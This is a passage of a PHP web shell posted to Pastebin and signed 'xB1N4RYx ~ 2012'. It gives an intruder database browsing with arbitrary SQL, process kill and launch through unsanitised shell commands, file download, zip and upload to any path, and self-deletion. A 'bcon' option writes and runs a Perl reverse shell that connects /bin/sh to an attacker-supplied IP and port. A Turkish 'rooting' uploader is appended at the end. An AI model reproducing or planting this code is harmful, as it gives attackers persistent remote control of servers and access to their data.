  787.         //if(!isset($_GET['db']) && isset($_POST['user'])){
  788.             $dbs = mysql_query("SHOW DATABASES");
  789.         echo '<table border="0" width="100%"><tr><td width="250px" valign="top" style="border-right: 1px solid #444444;">Databases:<hr style="border: 1px solid #444444;"/>';
  790.         echo '<table border="0">';
  791.         while ($row = mysql_fetch_assoc($dbs)) {
  792.             echo '<tr><td><a href="?page=mysql&a=tables&db='.$row['Database'].'">'.$row['Database'] . '</a></td><td align="right" width="100%">~&nbsp;<a align="right" href="?page=mysql&a=query&db='.$row['Database'].'">Query</a></td></tr>';
  793.         }
  794.         echo '</table>';
  795.         echo '</td><td align="center" valign="top">';
  796.         switch($_GET['a'])
  797.         {
  798.             default:
  799.                 echo '&nbsp;<hr/>';
  800.             break;
  801.            
  802.             case "tables":
  803.                 $db = $_GET['db'];
  804.                 echo 'Tables of '.$_GET['db'].'<hr/>';
  805.                 $t = mysql_query("SHOW TABLES FROM ".$_GET['db']);
  806.                 while($tb = mysql_fetch_row($t)){
  807.                     echo '<a href="?page=mysql&a=columns&table='.$tb[0].'&db='.$db.'">'.$tb[0].'</a><br>';
  808.                 }
  809.             break;
  810.            
  811.             case "columns":
  812.             echo 'Data of '.$_GET['table']." @ ".$_GET['db'].'<hr/>';
  813.             echo '<table border="0" height="100%" cellspacing="7px"><tr>';
  814.                 $db = $_GET['db'];
  815.                 $t = $_GET['table'];
  816.                 mysql_select_db($db, $l);
  817.                 $c = mysql_query("SHOW COLUMNS FROM ".$t);
  818.                 while($cc = mysql_fetch_array($c)){
  819.                     echo '<td align="center" style="border: 1px solid #444444; border-radius: 5px;">&nbsp;&nbsp;&nbsp;'.$cc[0].'&nbsp;&nbsp;&nbsp;</td>';
  820.                 }
  821.                 echo '</tr><tr>';
  822.                 $d = mysql_query("SELECT * FROM ".$t);
  823.                 while($dd = mysql_fetch_array($d)){
  824.                 echo '<tr>';
  825.                     for($i = 0; $i <= count($dd)/2-1; $i++){
  826.                         echo '<td style="border: 1px solid #444444; border-radius: 5px;" align="center">&nbsp;&nbsp;&nbsp;'.$dd[$i].'&nbsp;&nbsp;&nbsp;</td>';
  827.                         //echo '<script type="text/javascript">alert("'.count($dd).'");</script>';
  828.                     }
  829.                 echo '</tr>';
  830.                 }
  831.                 echo '</td>';
  832.             echo '</td></tr></table>';
  833.             break;
  834.            
  835.             case "query":
  836.                 $db = $_POST['pdb'];
  837.                 if(!isset($db))
  838.                     $db = $_GET['db'];
  839.                 $q = $_POST['query'];
  840.                 if(isset($db))
  841.                     echo 'Execute Query In '.$db.'<hr/>';
  842.                 if(isset($q)){
  843.                     mysql_select_db($db, $l);
  844.                     mysql_query(stripslashes($q));
  845.                     echo 'Done!';
  846.                 }
  847.                 echo '<form action="?page=mysql&a=query&db='.$db.'" method="post">';
  848.                 echo '<textarea rows="10" cols="80" name="query" id="query">'.stripslashes($q).'</textarea>';
  849.                 echo '<input type="hidden" name="pdb" id="pdb" value="'.$db.'"/>';
  850.                 echo '<div id="submit"><input type="submit" value="Execute"/></div>';
  851.                 echo '</form>';
  852.             break;
  853.         }
  854.         echo '</tr></table>';
  855.         }
  856.     break;
  857.    
  858.     case "ktask":
  859.         $f = $_GET['f'];
  860.         $win = binary_shell("taskkill /F /IM ".$f);
  861.         $gpid = binary_shell("pidof ".$f);
  862.         $linux = binary_shell("kill -9 ".$gpid);
  863.         if(isset($win))
  864.             echo "<center>".$win."</center>";
  865.         else
  866.             echo "<center>".$linux."</center>";
  867.     break;
  868.    
  869.     case "stask":
  870.         $f = $_GET['f'];
  871.         $folder = realpath($_SESSION['current_folder'])."/";
  872.         $win = binary_shell("cd ".$folder." && ".$f);
  873.         $linux = binary_shell("cd ".$folder." && "."./".$f);
  874.         if(isset($win))
  875.             echo "<center>".$win."</center>";
  876.         else
  877.             echo "<center>".$linux."</center>";
  878.     break;
  879.    
  880.     case "downloadfile":
  881.    
  882.     $f = $_GET['f'];
  883.     $file = realpath($_SESSION['current_folder'])."/".$f;
  884.  
  885.         if (file_exists($file)) {
  886.             header('Content-Description: File Transfer');
  887.             header('Content-Type: application/octet-stream');
  888.             header('Content-Disposition: attachment; filename='.$f);
  889.             header('Content-Transfer-Encoding: binary');
  890.             header('Expires: 0');
  891.             header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  892.             header('Pragma: public');
  893.             header('Content-Length: ' . filesize($file));
  894.             ob_clean();
  895.             flush();
  896.             readfile($file);
  897.             exit;
  898.             /*header('Content-disposition: attachment; filename='.$f.'');
  899.             header('Content-type: application/octet-stream');
  900.             ob_clean();
  901.             flush();
  902.             readfile($file);*/
  903.         }
  904.     break;
  905.    
  906.     case "downloadzip":
  907.         //echo '<script type="text/javascript">alert("Delete the ZIPfile after download!");</script>';
  908.         $f = $_GET['f'];
  909.         $file = realpath($_SESSION['current_folder'])."/".$f;
  910.         $fi = realpath("./".$f.'.zip');
  911.         compress($file, $f.'.zip');
  912.             header('Content-Description: File Transfer');
  913.             header('Content-Type: application/zip');
  914.             header('Content-Disposition: attachment; filename='.$f.'.zip');
  915.             header('Content-Transfer-Encoding: binary');
  916.             header('Expires: 0');
  917.             header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  918.             header('Pragma: public');
  919.             header('Content-Length: ' . filesize($fi));
  920.             ob_clean();
  921.             flush();
  922.             readfile($fi);
  923.             exit;
  924.     break;
  925.    
  926.     case "upload":
  927.         echo '<form action="?page=dupload" method="post" enctype="multipart/form-data"><br>';
  928.         echo 'Select File:<br><br>';
  929.         echo '<input type="file" id="f" name="f"/>';
  930.         echo '<br><br>Upload to:<br><div id="login"><input type="text" id="to" name="to" style="width: 300px;" value="'.realpath($_SESSION['current_folder']).'"/></div><br><div id="submit"><input type="submit" value="Upload"/></div>';
  931.         echo '</form>';
  932.     break;
  933.    
  934.     case "dupload":
  935.         $up = realpath($_POST['to'])."/".basename($_FILES['f']['name']);
  936.         if(move_uploaded_file($_FILES['f']['tmp_name'], $up))
  937.             echo "Upload Successful!";
  938.         else
  939.             echo "Upload Unsuccessful! :(";
  940.     break;
  941.    
  942.     case "sr":
  943.         echo '<center>Do you really want to <a href="?page=selfremove"><font color="#990000">remove this shell</font></a>?</center>';
  944.     break;
  945.    
  946.     case "selfremove":
  947.         unlink($_SERVER['SCRIPT_FILENAME']);
  948.         echo '<script>alert(\'Removed '.$_SERVER["SCRIPT_FILENAME"].'!\');';
  949.         echo 'location.href="?page=is_it_really_gone?";';
  950.         echo '</script>';
  951.     break;
  952.    
  953.     case "viewimage":
  954.         $i = $_GET['i'];
  955.         $v = realpath($_SESSION['current_folder']).$cslash.$i;
  956.         /*echo $v;
  957.         echo '<center>';
  958.         echo '<img src="C:\www/menace.png" border="0"/>';
  959.         echo '</center>';*/
  960.         header("Content-type: image/png");
  961.         ob_clean();
  962.         flush();
  963.         readfile($v);
  964.     break;
  965.    
  966.     case "viewmovie":
  967.         $i = $_GET['i'];
  968.         $v = realpath($_SESSION['current_folder']).$cslash.$i;
  969.         header("Content-type: video/quicktime");
  970.         ob_clean();
  971.         flush();
  972.         readfile($v);
  973.     break;
  974.    
  975.     case "bcon":
  976.         echo '<div id="login" style="margin-top: 10px; margin-left: 10px;">';
  977.         echo '<form action="?page=bcon" method="get"><input type="hidden" name="page" value="bcon"/>';
  978.         echo 'IP:<br><input type="text" name="ip" value="'.getenv("remote_addr").'" style="margin-top: 5px;"/><br><br>';
  979.         echo 'Port:<input type="submit" value="Connect" style="margin-left: 130px; margin-top: -4px;"/><br><input type="text" name="port" value="666" style="margin-top: 5px;"/>';
  980.         echo '</form>';
  981.         echo '</div>';
  982.         if(isset($_GET['ip']) && isset($_GET['port'])){
  983.             $ip = $_GET['ip'];
  984.             $port = $_GET['port'];
  985.             $bc = fopen("/tmp/bxcon.pl","w");
  986.             fwrite($bc,'#!/usr/bin/perl
  987. use Socket;
  988. $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n");
  989. $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n");
  990. $proto=getprotobyname("tcp");
  991. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  992. connect(SOCKET, $paddr) || die("Error: $!\n");
  993. open(STDIN, ">&SOCKET");
  994. open(STDOUT, ">&SOCKET");
  995. open(STDERR, ">&SOCKET");
  996. system("/bin/sh -i");
  997. close(STDIN);
  998. close(STDOUT);
  999. close(STDERR);');
  1000.             fclose($bc);
  1001.             shell_exec("perl /tmp/bxcon.pl");
  1002.             unlink("/tmp/bxcon.pl");
  1003.         }
  1004.     break;
  1005.  
  1006. }
  1007.  
  1008. echo '</td>
  1009. </tr>
  1010. </table>
  1011. <br><center>xB1N4RYx ~ 2012</center><br>
  1012. </body>
  1013. </html>';
  1014. ?>
  1015. <?php
  1016. function rooting()
  1017. {
  1018. echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
  1019. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1020. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1021. if( $_POST['_upl'] == "Upload" ) {
  1022.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
  1023.     else { echo '<b>Basarisiz</b><br><br>'; }
  1024. }
  1025. }
  1026. $x = $_GET["x"];
  1027. Switch($x){
  1028. case "rooting";
  1029.     rooting();
  1030.     break;
  1031.    
  1032.     }
  1033. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!